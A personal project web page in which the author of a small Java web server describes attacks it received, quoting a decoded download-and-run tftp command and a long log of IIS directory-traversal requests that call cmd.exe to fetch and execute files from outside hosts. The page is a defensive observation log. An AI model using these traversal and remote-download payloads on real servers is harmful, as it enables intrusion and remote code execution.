<< Attacks & Spying [43/117] >>

Attacks & Spying


Home / Projects / JWebServer / Attacks & Spying

Attacks & Spying



With the longer enterprise of the JWebServer I receive repeatedly different attacks and espionage attempts.

tftp-Attack:
This attack i receive in average every hour:
GET / HTTP/1.0
Host: xxx.xxx.xxx.xxx
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCE...
Decodes one the character sequence after "Negotiate" (ca. 6KB largely) with the Base64-Procedure this character sequence contains e.g. the following string:
cmd /c tftp -i 172.179.185.131 GET NPFMONTR.exe&start NPFMONTR.exe&exit
The IP and the name of the EXE file constantly vary thereby (e.g.: ms-wks32.exe, cgy32win.exe). The download by means of tftp is possible only within 3 minutes after the doing request, afterwards one gets a Timeout. The EXE files are coded by means of PolyCrypt of JLabSoftware (http://jlabsoftware.com/).
During execution of this character sequence (e.g. in the DOS) "NPFMONTR.exe" is downloaded by tftp program (trivial file transfer protocol) and executed afterwards. I do not believe that this execution lies in the interest of the server.
So far I investigated it give there a safety gap in the Microsoft server. Me it is however nevertheless doubtful why a server should execute such a character sequence at all.

Spying/Attack:
An espionage attack tried the following requests. As "host:" always "www" was conveyed, and the "Connection:"-parameter was always "close". Within one time interval of 50 seconds I got the following 76 requests (i.e. faster than in the 1-second pulse!):
- GET /scripts/root.exe?/c+dir HTTP/1.0
- GET /scripts/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /scripts/httpodbc.dll HTTP/1.0
- GET /MSADC/root.exe?/c+dir HTTP/1.0
- GET /MSADC/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /MSADC/httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0 
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /c/httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /d/httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../httpodbc.dll HTTP/1.0
Generally thus tried e.g. over "scripts/"-directory and the operator "../" to access predecessor-directories. If one would form e.g. in Java only a file object from the GET-request and would then transmit this file to the client, then this espionage attempt would have at least partial success!
Also tries to execute different DOS instructions (tftp, dir, cmd.exe, root.exe, etc.) and to overwrite determined DLL files by tftp instruction.


Visitors PageClicks Valid XHTML 1.0! Valid CSS!

CanciAbout meSite-MapRightsContactJSWins (JavaScript-Desktop-System)© 2004-2013 by Markus Krebs